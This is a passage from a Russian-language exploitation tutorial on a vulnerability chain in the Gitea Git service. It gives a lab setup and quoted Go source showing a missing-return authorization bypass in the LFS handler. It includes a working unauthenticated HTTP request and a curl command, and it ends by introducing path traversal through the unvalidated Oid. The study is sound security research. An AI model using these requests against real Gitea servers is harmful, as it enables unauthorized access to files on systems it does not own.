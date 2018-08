В этой статье я расскажу о нескольких уязвимостях в продукте Gitea . Это опенсорсная альтернатива GitHub, то есть сервис для работы с репозиториями Git. Основное отличие этого дистрибутива — в простоте настройки и использования: ты получаешь рабочую систему буквально в пару команд. Мы же пройдемся по цепочке уязвимостей, которая в конечном счете приведет к полной компрометации системы с возможностью выполнения произвольных команд.

INFO Gitea — это форк небезызвестной Gogs, написанный на языке Go.

Моя основная система — это Windows, поэтому на ней и будем разбирать примеры. Для запуска своего Git-сервиса достаточно просто скачать нужную версию и выполнить одну команду.

Уязвимы все версии до 1.4-rc3 включительно. Я решил использовать версию 1.3.3. Загрузим ее с официального сайта. После этого создадим отдельную папку, в которую перекинем скачанный файл. Дальше из командной строки выполняем следующие команды.

После запуска приложения в текущей директории будут созданы конфигурационные файлы. Переходим по адресу http://localhost:3000 и попадаем на экран первоначальной настройки системы. Тут все просто, и можно оставить все настройки по умолчанию. Только в качестве используемой БД я выбрал SQLite 3, потому что не хочу заморачиваться с отдельным сервером.

После базовой настройки остается только создать аккаунт и тестовый репозиторий.

Если ты хочешь использовать Linux в качестве подопытной системы, то уязвимый докер-контейнер можно поднять такой командой:

$ docker run -d --rm -p 3000:3000 --name=gitea vulhub/gitea:1.4.0

Остальные шаги будут аналогичны установке под Windows.

Первое звено цепочки. Path Traversal

Первая уязвимость в цепочке связана с обходом авторизации. Здесь стоит рассказать о Git LFS. Это специальный контейнер, который создан для хранения очень больших файлов Large File System (LFS). Такие файлы хранятся вне основной директории репозитория Git, а в нем находятся только файлы индекса. При первоначальной конфигурации Gitea можно указать путь этой папки (опция LFS Root Path), по умолчанию она установлена в data/lfs для Windows-версии сервера и /data/gitea/lfs/ для Linux.

Вся логика для работы с HTTP-запросами к LFS описана в файле modules/lfs/server.go. Посмотрим на обработчик POST-запросов, служащий для отправки информации о больших файлах.

/modules/lfs/server.go

199: func PostHandler(ctx *context.Context) { 200: 201: if !setting.LFS.StartServer { 202: writeStatus(ctx, 404) 203: return 204: } 205: 206: if !MetaMatcher(ctx.Req) { 207: writeStatus(ctx, 400) 208: return 209: } ... 221: if !authenticate(ctx, repository, rv.Authorization, true) { 222: requireAuth(ctx) 223: }

Обрати внимание на строку 221: здесь происходит проверка прав текущего пользователя на репозиторий, к которому будут привязываться загруженные файлы.

/modules/lfs/server.go

480: func authenticate(ctx *context.Context, repository *models.Repository, authorization string, requireWrite bool) bool { ... 491: if ctx.IsSigned { 492: accessCheck, _ := models.HasAccess(ctx.User.ID, repository, accessMode) 493: return accessCheck 494: } ... 504: if !strings.HasPrefix(authorization, "Basic ") { 505: return false 506: } ... 508: c, err := base64.StdEncoding.DecodeString(strings.TrimPrefix(authorization, "Basic ")) 509: if err != nil { 510: return false 511: } ... 524: if !userModel.ValidatePassword(password) { 525: return false 526: } ... 528: accessCheck, _ := models.HasAccess(userModel.ID, repository, accessMode) 529: return accessCheck

Если доступа у юзера нет или запрос вообще был отправлен неавторизованным анонимом, то вызывается requireAuth . Эта функция возвращает ответ со статусом 401.

/modules/lfs/server.go

572: func requireAuth(ctx *context.Context) { 573: ctx.Resp.Header().Set("WWW-Authenticate", "Basic realm=gitea-lfs") 574: writeStatus(ctx, 401) 575: }

Однако PostHandler после этого не прекращает выполнение, так как отсутствует выход из функции с помощью оператора return , как это сделано в предыдущих проверках на строках 201 и 206. Из-за этого ошибка сохранения данных о файле все же произойдет.

/modules/lfs/server.go

225: meta, err := models.NewLFSMetaObject(&models.LFSMetaObject{Oid: rv.Oid, Size: rv.Size, RepositoryID: repository.ID}) 226: if err != nil { 227: writeStatus(ctx, 404) 228: return 229: }

Запомним этот трюк и посмотрим на структуру тела запроса, который сохраняет данные о большом файле.

{ "Oid": "aabbccddeeff01234567890123456789012345678", "Size": 1000000 }

С size , я думаю, все понятно — это размер файла, а вот Oid — это ID объекта (ObjectID). Это SHA-хеш, контрольная сумма содержимого и заголовка файла. Если ты знаешь структуру репозитория, то в курсе, что существует папка objects , в которой и хранятся эти объекты. Подробнее о структуре можно прочитать, например, на git-scm.com.

Сейчас же нас интересует, что данный хеш — это часть пути, который будет формироваться при попытке доступа к нужному объекту. В Gitea они сохраняются в базе данных, в таблице lfs_meta_object .

/models/lfs.go

44: func NewLFSMetaObject(m *LFSMetaObject) (*LFSMetaObject, error) { ... 63: if _, err = sess.Insert(m); err != nil { 64: return nil, err 65: } 66: 67: return m, sess.Commit()

/models/lfs.go

09: type LFSMetaObject struct { 10: ID int64 `xorm:"pk autoincr"` 11: Oid string `xorm:"UNIQUE(s) INDEX NOT NULL"` 12: Size int64 `xorm:"NOT NULL"` 13: RepositoryID int64 `xorm:"UNIQUE(s) INDEX NOT NULL"` 14: Existing bool `xorm:"-"` 15: Created time.Time `xorm:"-"` 16: CreatedUnix int64 `xorm:"created"` 17: }

При помощи следующего запроса мы создадим записи о наличии большого файла в репозитории.

POST /vh/test.git/info/lfs/objects HTTP/1.1 Host: gitea.vh:3000 Accept: application/vnd.git-lfs+json Accept-Language: en Content-Type: application/json Content-Length: 151 { "Oid": "aabbccddeeff01234567890123456789012345678", "Size": 1000000 }

В таблице lfs_meta_object появилась новая запись. Чтобы в этом убедиться, я открою файл data/gitea.db . Как ты помнишь, в качестве БД я использую SQLite.

Обрати внимание, что статус ответа — 401 и первая строка — {"message": "Unauthorized"} . Но это не помешало оставшейся части кода выполниться и создать запись. Байпас в действии.

Предыдущим запросом мы сказали системе: «Хэй, Gitea, в репозитории test.git, принадлежащем юзеру vh, есть большой файл, за который отвечает объект с именем aabbcc…». Теперь по адресу http://gitea.vh:3000/vh/test/info/lfs/objects/aabbcc... у нас имеется интерфейс для работы с файлом. Разными запросами мы можем читать, удалять и изменять файл. В общем случае при обращении к этому объекту система будет пытаться найти его на диске и открыть.

Посмотрим на обработчик getContentHandler .

/modules/lfs/server.go

134: func getContentHandler(ctx *context.Context) { 135: rv := unpack(ctx) 136: 137: meta, _ := getAuthenticatedRepoAndMeta(ctx, rv, false) ... 155: contentStore := &ContentStore{BasePath: setting.LFS.ContentPath} 156: content, err := contentStore.Get(meta, fromByte)

Корневая директория LFS, в которой должны храниться все большие файлы, как мы уже знаем, указывается при начальной настройке системы. Она лежит в setting.LFS.ContentPath (LFS_CONTENT_PATH в ini-файле). Работа с ContentStore описана в файле modules/lfs/content_store.go . Посмотрим на метод Get .

/modules/lfs/content_store.go

26: func (s *ContentStore) Get(meta *models.LFSMetaObject, fromByte int64) (io.ReadCloser, error) { 27: path := filepath.Join(s.BasePath, transformKey(meta.Oid)) 28: 29: f, err := os.Open(path) 30: if err != nil { 31: return nil, err 32: } 33: if fromByte > 0 { 34: _, err = f.Seek(fromByte, os.SEEK_CUR) 35: } 36: return f, err 37: }

Его можно триггернуть при помощи GET-запроса.

$ curl -I -s "http://gitea.vh:3000/vh/test/info/lfs/objects/aabbccddeeff01234567890123456789012345678/any"

На 27-й строке формируется путь до файла. В ней используется путь к хранилищу LFS и Oid, переданный нами в запросе. Но сначала хеш попадает в функцию transformKey .

/modules/lfs/content_store.go

100: func transformKey(key string) string { 101: if len(key) < 5 { 102: return key 103: } 104: 105: return filepath.Join(key[0:2], key[2:4], key[4:]) 106: }

Конструкция filepath.Join(key[0:2], key[2:4], key[4:]) приводит нашу строку к следующему виду:

aa/bb/ccddeeff01234567890123456789012345678

Это относительный путь файла, который нужно прочитать. Не забываем про BasePath , в итоге полный путь выглядит так:

для Windows: <директория_запуска_gitea>/data/lfs/aa/bb/ccddeeff01234567890123456789012345678

для Linux: /data/gitea/lfs/aa/bb/ccddeeff01234567890123456789012345678

Разумеется, такого файла сейчас не существует и наш запрос вернет код 404.

И все бы ничего, но вот только параметр Oid никак не проверяется при записи в базу. Значит, можно попробовать провернуть атаку типа path traversal, выйти из корневой директории LFS и прочитать любой файл. Давай проверим.